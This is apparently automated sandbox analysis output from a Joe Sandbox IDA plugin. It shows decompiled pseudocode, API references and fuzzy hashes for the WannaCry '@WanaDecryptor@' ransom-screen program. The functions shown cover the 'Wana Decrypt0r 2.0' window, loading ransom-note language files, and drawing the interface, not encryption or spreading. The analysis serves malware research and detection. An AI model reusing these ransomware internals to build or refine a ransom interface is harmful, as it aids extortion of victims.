                                                      				_v12 = 0xb;
                                                      				L00412C8C();
                                                      				 *((intOrPtr*)(__ecx + 0x4c0)) = 0x416478;
                                                      				_v12 = 0xc;
                                                      				L00412DA6();
                                                      				_v12 = 0xd;
                                                      				L00412DA6();
                                                      				_v12 = 0xe;
                                                      				L00412DA6();
                                                      				_v12 = 0xf;
                                                      				L00412DA6();
                                                      				 *((intOrPtr*)(__ecx + 0x834)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x830)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x83c)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x838)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x844)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x840)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x84c)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x848)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x854)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x850)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x85c)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x858)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x864)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x860)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x86c)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x868)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x874)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x870)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x87c)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x878)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x884)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x880)) = 0x415a30;
                                                      				_v12 = 0x1b;
                                                      				_t82 = E00407640(__ecx + 0x888);
                                                      				 *((intOrPtr*)(__ecx + 0x888)) = 0x415a30;
                                                      				 *((intOrPtr*)(__ecx + 0x894)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x890)) = 0x415a30;
                                                      				_push(0x421798);
                                                      				_v12 = 0x1d;
                                                      				 *((intOrPtr*)(__ecx)) = 0x4163a0;
                                                      				L00412DA0();
                                                      				_push(0x421798);
                                                      				L00412DA0();
                                                      				_push(0x421798);
                                                      				L00412DA0();
                                                      				L00412E5A();
                                                      				_push(0x80);
                                                      				_push(0xe);
                                                      				L00412F2C();
                                                      				_t83 = LoadIconA(_t82, 0x80); // executed
                                                      				_push(0x421798);
                                                      				 *(_t119 + 0x82c) = _t83;
                                                      				 *((intOrPtr*)(_t119 + 0x824)) = 0;
                                                      				 *((intOrPtr*)(_t119 + 0x828)) = 0;
                                                      				 *((intOrPtr*)(_t119 + 0x818)) = 0;
                                                      				L00412DA0();
                                                      				 *((intOrPtr*)(_t119 + 0x820)) = 0;
                                                      				 *[fs:0x0] = _v44;
                                                      				return _t119;
                                                      			}

                                                      APIs
                                                      • #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
                                                      • #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
                                                      • #567.MFC42(00000066,00000000), ref: 0040612F
                                                      • #567.MFC42(00000066,00000000), ref: 00406147
                                                        • Part of subcall function 004085C0: #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
                                                        • Part of subcall function 004085C0: #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
                                                        • Part of subcall function 004085C0: GetSysColor.USER32 ref: 0040861D
                                                        • Part of subcall function 004085C0: GetSysColor.USER32(00000009), ref: 00408624
                                                        • Part of subcall function 004085C0: GetSysColor.USER32(00000012), ref: 0040862B
                                                        • Part of subcall function 004085C0: GetSysColor.USER32(00000002), ref: 00408632
                                                        • Part of subcall function 004085C0: KiUserCallbackDispatcher.NTDLL(00001008,00000000,00000000,00000000), ref: 0040864A
                                                        • Part of subcall function 004085C0: GetSysColor.USER32(0000001B), ref: 0040865C
                                                        • Part of subcall function 004085C0: #6140.MFC42(00000002,000000FF), ref: 00408667
                                                        • Part of subcall function 00404090: #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
                                                        • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
                                                        • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
                                                        • Part of subcall function 00404090: #860.MFC42(00421798), ref: 004040F6
                                                        • Part of subcall function 00404090: #858.MFC42(00000000,00421798), ref: 004040FE
                                                        • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F89), ref: 00404118
                                                        • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F00), ref: 00404123
                                                        • Part of subcall function 00405000: #567.MFC42(?,?,?,?,00413893,000000FF), ref: 0040501E
                                                        • Part of subcall function 00405000: #540.MFC42(?,?,?,?,00413893,000000FF), ref: 00405032
                                                      • #567.MFC42(00000066,00000000), ref: 004061DF
                                                      • #540.MFC42(00000066,00000000), ref: 004061F7
                                                      • #540.MFC42(00000066,00000000), ref: 00406209
                                                      • #540.MFC42(00000066,00000000), ref: 00406219
                                                      • #540.MFC42(00000066,00000000), ref: 00406229
                                                      • #860.MFC42(00421798,00000066,00000000), ref: 004062F7
                                                      • #860.MFC42(00421798,00421798,00000066,00000000), ref: 00406303
                                                      • #860.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406313
                                                      • #1168.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406318
                                                      • #1146.MFC42(00000080,0000000E,00000080,00421798,00421798,00421798,00000066,00000000), ref: 00406329
                                                      • LoadIconA.USER32(00000000,00000080), ref: 0040632F
                                                      • #860.MFC42(00421798), ref: 00406358
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #540#567$#860Color$Load$Cursor$#1146#1168#324#341#6140#858CallbackDispatcherIconUser
                                                      • String ID: 0ZA$0ZA$0ZA$DZA
                                                      • API String ID: 3237077636-3729005435
                                                      • Opcode ID: 8898f9c07cd83b19e88eb16f26038038037ccb9ffe995bcce6d49ed8a8e75e34
                                                      • Instruction ID: 094c42c2691411c2b0867f220185f46eb880b1852b80e7f1edf951ce12ca3c27
                                                      • Opcode Fuzzy Hash: 8898f9c07cd83b19e88eb16f26038038037ccb9ffe995bcce6d49ed8a8e75e34
                                                      • Instruction Fuzzy Hash: 6261E970544B419ED364EF36C5817DAFBE4BF95304F40891EE1EA82281DFB86149CFAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 64%
                                                      			E00406AE0(void* __ecx) {
                                                      				char _v4;
                                                      				char _v12;
                                                      				char _v24;
                                                      				char _v28;
                                                      				intOrPtr _v36;
                                                      				char _v40;
                                                      				void* _v280;
                                                      				char _v284;
                                                      				char _v288;
                                                      				char _v292;
                                                      				void* _v296;
                                                      				char _v300;
                                                      				intOrPtr _v304;
                                                      				char _v308;
                                                      				void* _v312;
                                                      				void* _v316;
                                                      				char** _t26;
                                                      				long _t30;
                                                      				void* _t31;
                                                      				char** _t32;
                                                      				void* _t56;
                                                      				intOrPtr _t58;
                                                      				void* _t60;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413E61);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t58;
                                                      				_t56 = __ecx;
                                                      				L00412DA6();
                                                      				_t26 =  &_v284;
                                                      				_push(_t26);
                                                      				_v4 = 0;
                                                      				L00412DD6(); // executed
                                                      				_push("msg\\");
                                                      				L00412CAA();
                                                      				_push("m_%s.wnry");
                                                      				_push(_t26);
                                                      				_push( &_v288);
                                                      				_v12 = 1;
                                                      				L00412CCE();
                                                      				sprintf( &_v292,  *_t26, _v304);
                                                      				_t60 = _t58 - 0x110 + 0xc;
                                                      				L00412CC2();
                                                      				_v24 = 0;
                                                      				L00412CC2();
                                                      				_t30 = GetFileAttributesA( &_v292); // executed
                                                      				if(_t30 == 0xffffffff) {
                                                      					_push("msg\\");
                                                      					L00412CAA();
                                                      					_push("m_%s.wnry");
                                                      					_push(_t30);
                                                      					_t32 =  &_v300;
                                                      					_v28 = 2;
                                                      					_push(_t32);
                                                      					L00412CCE();
                                                      					sprintf( &_v308,  *_t32, "English");
                                                      					_t60 = _t60 + 0xc;
                                                      					L00412CC2();
                                                      					_v40 = 0;
                                                      					L00412CC2();
                                                      				}
                                                      				_t31 = E00406CF0(_t56,  &_v292);
                                                      				_v28 = 0xffffffff;
                                                      				L00412CC2();
                                                      				 *[fs:0x0] = _v36;
                                                      				return _t31;
                                                      			}



























                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$#537#924sprintf$#3874#540AttributesFile
                                                      • String ID: English$m_%s.wnry$msg\
                                                      • API String ID: 3713669620-4206458537
                                                      • Opcode ID: f36c2dcfbfc0b931c038135b008570d0ce4cdd6941e9a910e96e45ef17743a79
                                                      • Instruction ID: 3ad7a17867ea9436e9d42ea8b12d154e8c58dea708134770199309aae3637b36
                                                      • Opcode Fuzzy Hash: f36c2dcfbfc0b931c038135b008570d0ce4cdd6941e9a910e96e45ef17743a79
                                                      • Instruction Fuzzy Hash: 4A316170108341AEC324EB25D941FDE77A4BBA8714F404E1EF59AC32D1EB789558CAA7
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 94%
                                                      			E00405A60(void* __ecx) {
                                                      				char _v8;
                                                      				intOrPtr _v16;
                                                      				char _v24;
                                                      				char _v32;
                                                      				char _v40;
                                                      				char _v48;
                                                      				char _v56;
                                                      				char _v64;
                                                      				char _v72;
                                                      				char _v80;
                                                      				char _v88;
                                                      				char _v96;
                                                      				char _v104;
                                                      				char _v112;
                                                      				char _v120;
                                                      				void* _v140;
                                                      				void* _v928;
                                                      				void* _v932;
                                                      				void* _v936;
                                                      				void* _v1000;
                                                      				char _v1124;
                                                      				char _v1248;
                                                      				char _v1352;
                                                      				char _v1456;
                                                      				char _v1560;
                                                      				char _v1664;
                                                      				char _v1796;
                                                      				char _v1928;
                                                      				void* _v1992;
                                                      				void* _v2056;
                                                      				void* _v2120;
                                                      				char _v2212;
                                                      				char _v2216;
                                                      				intOrPtr _t144;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413A76);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t144;
                                                      				E0040B620(L"Wana Decrypt0r 2.0", 1);
                                                      				_push(0);
                                                      				L00412F08();
                                                      				L00412F02();
                                                      				L00412EFC();
                                                      				E004060E0( &_v2212, 0);
                                                      				_v8 = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x20)) =  &_v2216;
                                                      				L00412B72(); // executed
                                                      				_v8 = 0x1d;
                                                      				_v24 = 0x415a30;
                                                      				E00403F20( &_v24);
                                                      				_v8 = 0x1c;
                                                      				_v32 = 0x415a30;
                                                      				E00403F20( &_v32);
                                                      				_v8 = 0x1b;
                                                      				_v40 = 0x415a30;
                                                      				E00403F20( &_v40);
                                                      				_v8 = 0x1a;
                                                      				_v48 = 0x415a44;
                                                      				E00403F20( &_v48);
                                                      				_v8 = 0x19;
                                                      				_v56 = 0x415a44;
                                                      				E00403F20( &_v56);
                                                      				_v8 = 0x18;
                                                      				_v64 = 0x415a44;
                                                      				E00403F20( &_v64);
                                                      				_v8 = 0x17;
                                                      				_v72 = 0x415a44;
                                                      				E00403F20( &_v72);
                                                      				_v8 = 0x16;
                                                      				_v80 = 0x415a44;
                                                      				E00403F20( &_v80);
                                                      				_v8 = 0x15;
                                                      				_v88 = 0x415a44;
                                                      				E00403F20( &_v88);
                                                      				_v8 = 0x14;
                                                      				_v96 = 0x415a44;
                                                      				E00403F20( &_v96);
                                                      				_v8 = 0x13;
                                                      				_v104 = 0x415a44;
                                                      				E00403F20( &_v104);
                                                      				_v8 = 0x12;
                                                      				E00403F90( &_v112);
                                                      				_v8 = 0x11;
                                                      				E00403F90( &_v120);
                                                      				_v8 = 0x10;
                                                      				L00412CC2();
                                                      				_v8 = 0xf;
                                                      				L00412CC2();
                                                      				_v8 = 0xe;
                                                      				L00412CC2();
                                                      				_v8 = 0xd;
                                                      				L00412CC2();
                                                      				_v8 = 0xc;
                                                      				L00412EF6();
                                                      				_v8 = 0xb;
                                                      				E004050A0( &_v1124);
                                                      				_v8 = 0xa;
                                                      				E004050A0( &_v1248);
                                                      				_v8 = 9;
                                                      				E00404170( &_v1352);
                                                      				_v8 = 8;
                                                      				E00404170( &_v1456);
                                                      				_v8 = 7;
                                                      				E00404170( &_v1560);
                                                      				_v8 = 6;
                                                      				E00404170( &_v1664);
                                                      				_v8 = 5;
                                                      				E00405D90( &_v1796);
                                                      				_v8 = 4;
                                                      				E00405D90( &_v1928);
                                                      				_v8 = 3;
                                                      				L00412EF0();
                                                      				_v8 = 2;
                                                      				L00412EF0();
                                                      				_v8 = 1;
                                                      				L00412D4C();
                                                      				_v8 = 0xffffffff;
                                                      				L00412C86();
                                                      				 *[fs:0x0] = _v16;
                                                      				return 0;
                                                      			}






































                                                      APIs
                                                        • Part of subcall function 0040B620: FindWindowW.USER32(00000000,00000000), ref: 0040B628
                                                        • Part of subcall function 0040B620: ShowWindow.USER32(00000000,00000005,00000000,?,00000000), ref: 0040B638
                                                        • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B651
                                                        • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B660
                                                        • Part of subcall function 0040B620: KiUserCallbackDispatcher.NTDLL(00000000), ref: 0040B663
                                                        • Part of subcall function 0040B620: SetFocus.USER32(00000000,?,00000000), ref: 0040B66A
                                                        • Part of subcall function 0040B620: SetActiveWindow.USER32(00000000,?,00000000), ref: 0040B671
                                                        • Part of subcall function 0040B620: BringWindowToTop.USER32(00000000), ref: 0040B678
                                                        • Part of subcall function 0040B620: ExitProcess.KERNEL32 ref: 0040B689
                                                      • #1134.MFC42(00000000,Wana Decrypt0r 2.0,00000001), ref: 00405A8C
                                                      • #2621.MFC42 ref: 00405A96
                                                      • #6438.MFC42 ref: 00405A9B
                                                        • Part of subcall function 004060E0: #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
                                                        • Part of subcall function 004060E0: #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
                                                        • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 0040612F
                                                        • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 00406147
                                                        • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 004061DF
                                                        • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 004061F7
                                                        • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406209
                                                        • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406219
                                                        • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406229
                                                      • #2514.MFC42 ref: 00405AC1
                                                        • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
                                                        • Part of subcall function 00403F90: #2414.MFC42(?,?,?,004136D8,000000FF,00403F78), ref: 00403FBB
                                                      • #800.MFC42 ref: 00405C33
                                                      • #800.MFC42 ref: 00405C47
                                                      • #800.MFC42 ref: 00405C5B
                                                      • #800.MFC42 ref: 00405C6F
                                                      • #781.MFC42 ref: 00405C83
                                                        • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
                                                        • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
                                                        • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                                        • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                                        • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                                        • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                                        • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
                                                        • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
                                                      • #609.MFC42 ref: 00405D37
                                                      • #609.MFC42 ref: 00405D4B
                                                      • #616.MFC42 ref: 00405D5C
                                                      • #641.MFC42 ref: 00405D70
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$Window$#540#567$#2414$#609#795$#1134#2514#2621#324#616#641#6438#654#765#781ActiveBringCallbackDispatcherExitFindFocusProcessShowUser
                                                      • String ID: 0ZA$DZA$Wana Decrypt0r 2.0
                                                      • API String ID: 1759550818-2594244635
                                                      • Opcode ID: e0fcef159a601972dbb815ea7c34e59d1ddbf6f278b0c37dd8899ed76481b774
                                                      • Instruction ID: 9717df00861f10ea142a6202e5f0f29f583150bd1f0a7909c2c79a4805d5fd97
                                                      • Opcode Fuzzy Hash: e0fcef159a601972dbb815ea7c34e59d1ddbf6f278b0c37dd8899ed76481b774
                                                      • Instruction Fuzzy Hash: 3871B7345097C18EE735EB25C2557DFBBE4BFA6308F48981E94C916682DFB81108CBA7
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      control_flow_graph 289 407a90-407ab7 290 407bf4-407c28 #2385 289->290 291 407abd-407ac5 289->291 292 407ac7 291->292 293 407aca-407ad1 291->293 292->293 293->290 294 407ad7-407af9 call 404c40 #2514 293->294 297 407b72-407bef #2414 * 2 #800 #641 294->297 298 407afb-407b6d #537 #941 #939 #6876 * 2 #535 call 4082c0 #800 294->298 297->290 298->297
                                                      C-Code - Quality: 68%
                                                      			E00407A90(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                      				char _v4;
                                                      				char _v8;
                                                      				char _v20;
                                                      				intOrPtr _v24;
                                                      				char _v32;
                                                      				void* _v36;
                                                      				char _v44;
                                                      				char _v132;
                                                      				char* _v136;
                                                      				void* _v140;
                                                      				void* _v144;
                                                      				void* _v148;
                                                      				void* _v152;
                                                      				char _v160;
                                                      				intOrPtr _v164;
                                                      				char _v168;
                                                      				void* _v180;
                                                      				intOrPtr _t42;
                                                      				intOrPtr _t43;
                                                      				void* _t44;
                                                      				void* _t70;
                                                      				intOrPtr _t72;
                                                      				intOrPtr _t73;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413F17);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t72;
                                                      				_t73 = _t72 - 0x80;
                                                      				_t70 = __ecx;
                                                      				if(_a4 == 0x1388) {
                                                      					_t43 = __ecx + 0x2f8;
                                                      					if(_t43 != 0) {
                                                      						_t43 =  *((intOrPtr*)(_t43 + 0x20));
                                                      					}
                                                      					if(_a8 == _t43) {
                                                      						_t44 = E00404C40( &_v132, 0);
                                                      						_v8 = 0;
                                                      						L00412B72();
                                                      						if(_t44 == 1) {
                                                      							_push("***");
                                                      							L00412CAA();
                                                      							_push("\t");
                                                      							_v8 = 1;
                                                      							L00412F68();
                                                      							_push( &_v44);
                                                      							L00412F62();
                                                      							_push(0x3b);
                                                      							_push(0xa);
                                                      							L00412F5C();
                                                      							_push(0x3b);
                                                      							_push(0xd);
                                                      							L00412F5C();
                                                      							_push(1);
                                                      							_v164 = _t73;
                                                      							L00412F56();
                                                      							E004082C0(_t70,  &_v168,  &_v160);
                                                      							_v44 = 0;
                                                      							L00412CC2();
                                                      						}
                                                      						_v4 = 2;
                                                      						_v20 = 0x415c00;
                                                      						_v136 =  &_v20;
                                                      						_v4 = 5;
                                                      						L00412D52();
                                                      						_v20 = 0x415bec;
                                                      						_v136 =  &_v32;
                                                      						_v32 = 0x415c00;
                                                      						_v4 = 6;
                                                      						L00412D52();
                                                      						_v32 = 0x415bec;
                                                      						_v4 = 2;
                                                      						L00412CC2();
                                                      						_v4 = 0xffffffff;
                                                      						L00412C86();
                                                      					}
                                                      				}
                                                      				_t42 = _a8;
                                                      				_push(_a12);
                                                      				_push(_t42);
                                                      				_push(_a4);
                                                      				L00412BAE(); // executed
                                                      				 *[fs:0x0] = _v24;
                                                      				return _t42;
                                                      			}

                                                      APIs
                                                      • #2514.MFC42 ref: 00407AF1
                                                      • #537.MFC42(***), ref: 00407B04
                                                      • #941.MFC42(00421234,***), ref: 00407B1A
                                                      • #939.MFC42(?,00421234,***), ref: 00407B28
                                                      • #6876.MFC42(0000000A,0000003B,?,00421234,***), ref: 00407B35
                                                      • #6876.MFC42(0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B42
                                                      • #535.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B55
                                                      • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B6D
                                                      • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B99
                                                      • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BC2
                                                      • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BDB
                                                      • #641.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BEF
                                                      • #2385.MFC42(?,?,?), ref: 00407C0E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414#6876#800$#2385#2514#535#537#641#939#941
                                                      • String ID: ***$[A$[A
                                                      • API String ID: 3659526348-3419262722
                                                      • Opcode ID: 7b5a321b8fc36d37a949ca2324a4224a0761ed0f7d540cde034222370581aa5f
                                                      • Instruction ID: 6b54b999ec918a2e7db5809f8de8f0b59fd624410e6f3b71b4409e3b9ece79cc
                                                      • Opcode Fuzzy Hash: 7b5a321b8fc36d37a949ca2324a4224a0761ed0f7d540cde034222370581aa5f
                                                      • Instruction Fuzzy Hash: D5416A3410C781DAD324DB21C541BEFB7E4BB94704F408A1EB5A9832D1DBB89549CF67
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      control_flow_graph 301 405580-4055c1 GetClientRect 302 4055c7-405664 #470 #1168 #8 #323 CreateCompatibleDC #1640 #2860 301->302 303 4057c9-4057e0 301->303 304 405666 302->304 305 405669-4056ac #5785 CreateSolidBrush FillRect 302->305 304->305 306 405770-405777 305->306 307 4056b2-405721 call 405110 BitBlt 305->307 308 405779 306->308 309 40577c-4057c4 #5785 #2405 DeleteObject * 2 #640 #755 306->309 312 405723-405729 307->312 313 40575b-40576a 307->313 308->309 309->303 312->306 314 40572b-40572d 312->314 313->306 313->307 314->313 315 40572f-405734 314->315 315->313 316 405736-40573a 315->316 316->306 317 40573c-405757 316->317 317->313
                                                      C-Code - Quality: 78%
                                                      			E00405580(void* __ecx) {
                                                      				int _v8;
                                                      				intOrPtr _v12;
                                                      				char _v28;
                                                      				char _v80;
                                                      				void* _v96;
                                                      				struct tagRECT _v112;
                                                      				signed int _v116;
                                                      				void* _v120;
                                                      				struct HDC__* _v140;
                                                      				long _v144;
                                                      				struct tagRECT _v160;
                                                      				char _v164;
                                                      				void* _v172;
                                                      				intOrPtr _v176;
                                                      				char _v188;
                                                      				int _v192;
                                                      				int _v196;
                                                      				int _v204;
                                                      				intOrPtr _v212;
                                                      				void* _v216;
                                                      				struct HBRUSH__* _v220;
                                                      				char _v224;
                                                      				intOrPtr _v228;
                                                      				void* _v244;
                                                      				intOrPtr _v248;
                                                      				intOrPtr _v252;
                                                      				signed int _v256;
                                                      				void* _v260;
                                                      				void* _v264;
                                                      				void* _v268;
                                                      				int _v272;
                                                      				intOrPtr _v296;
                                                      				intOrPtr _v300;
                                                      				intOrPtr _v304;
                                                      				int _t78;
                                                      				long _t79;
                                                      				struct HBRUSH__* _t80;
                                                      				struct HDC__* _t84;
                                                      				char _t85;
                                                      				struct HBRUSH__* _t86;
                                                      				intOrPtr _t89;
                                                      				intOrPtr _t90;
                                                      				intOrPtr _t102;
                                                      				intOrPtr _t104;
                                                      				intOrPtr _t108;
                                                      				intOrPtr _t136;
                                                      				void* _t151;
                                                      				struct HBRUSH__* _t152;
                                                      				void* _t153;
                                                      				void* _t156;
                                                      				int _t160;
                                                      				intOrPtr _t162;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413943);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t162;
                                                      				_t156 = __ecx;
                                                      				_t78 = GetClientRect( *(__ecx + 0x20),  &_v112);
                                                      				_t160 = 0;
                                                      				_v204 = 0;
                                                      				_t108 =  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x44)) - 8));
                                                      				_v176 = _t108;
                                                      				if(_t108 != 0) {
                                                      					L00412DD0(); // executed
                                                      					_t79 =  *(_t156 + 0x50);
                                                      					_v8 = 0;
                                                      					_v164 = 0xffb53f;
                                                      					_v160.left = _t79;
                                                      					_v160.top = 0x674017;
                                                      					_v160.right =  *((intOrPtr*)(_t156 + 0x4c));
                                                      					_v160.bottom = 0;
                                                      					_v144 =  *(_t156 + 0x54);
                                                      					L00412E5A();
                                                      					_t80 =  *((intOrPtr*)(_t79 + 8));
                                                      					__imp__#8(_t80,  *((intOrPtr*)(_t156 + 0x58)), 0,  &_v164, 3, _t156, _t151);
                                                      					_t152 = _t80;
                                                      					_v220 = _t152;
                                                      					L00412E54();
                                                      					asm("sbb eax, eax");
                                                      					_v28 = 1;
                                                      					_t84 = CreateCompatibleDC( ~( &_v120) & _v116);
                                                      					_push(_t84);
                                                      					L00412E4E();
                                                      					_push(_t152); // executed
                                                      					L00412DE2(); // executed
                                                      					if(_t84 != 0) {
                                                      						_t84 =  *(_t84 + 4);
                                                      					}
                                                      					_push(_t84);
                                                      					_t85 = _v224;
                                                      					_push(_t85);
                                                      					L00412E48();
                                                      					_v212 = _t85;
                                                      					_t153 = 0;
                                                      					_v252 = 1;
